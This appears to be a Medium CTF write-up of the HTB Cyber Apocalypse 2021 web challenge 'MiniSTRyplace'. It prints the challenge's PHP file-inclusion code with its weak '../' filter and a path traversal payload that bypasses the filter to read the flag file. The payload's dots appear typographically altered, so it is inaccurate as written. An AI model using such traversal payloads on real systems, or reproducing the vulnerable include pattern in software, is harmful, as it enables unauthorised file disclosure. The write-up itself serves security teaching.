HTB Cyber Apocalypse CTF 2021: MiniSTRyplace

MiniSTRyplace is a web-based challenge with a difficulty of one star,

Let’s start by reading the source code from the folder provided,

Wait! what??! flag file? well, it's fake,

CHTB{f4k3_fl4g_f0r_t3st1ng}

In the challenge directory, I found the ‘index.php’ file,

<html><header><meta name='author' content='bertolis, makelaris'><title>Ministry of Defence</title><link rel="stylesheet" href="/static/css/main.css"><link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootswatch/4.5.0/slate/bootstrap.min.css"   ></header><body><div class="language"><a href="?lang=en.php">EN</a><a href="?lang=qw.php">QW</a></div><?php$lang = ['en.php', 'qw.php'];include('pages/' . (isset($_GET['lang']) ? str_replace('../', '', $_GET['lang']) : $lang[array_rand($lang)]));?></body></html>

But the input is getting sanitized, we cannot use “../” to go up a directory the program removes it, We can bypass the sanitization,

Input: …/./
Output: ../

Now we can easily bypass the sanitization and go up a directory,

In the Docker file, it is specified that the flag file is in the root directory,

Let’s GET the flag:

?lang=…/./…/./…/./…/./flag

Спасибо :) — Mudhalai Mr Team 1nf1n1ty

<>AKA Gowtham Student at SASTRA Deemed university, Core team member DSC SASTRA </>

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store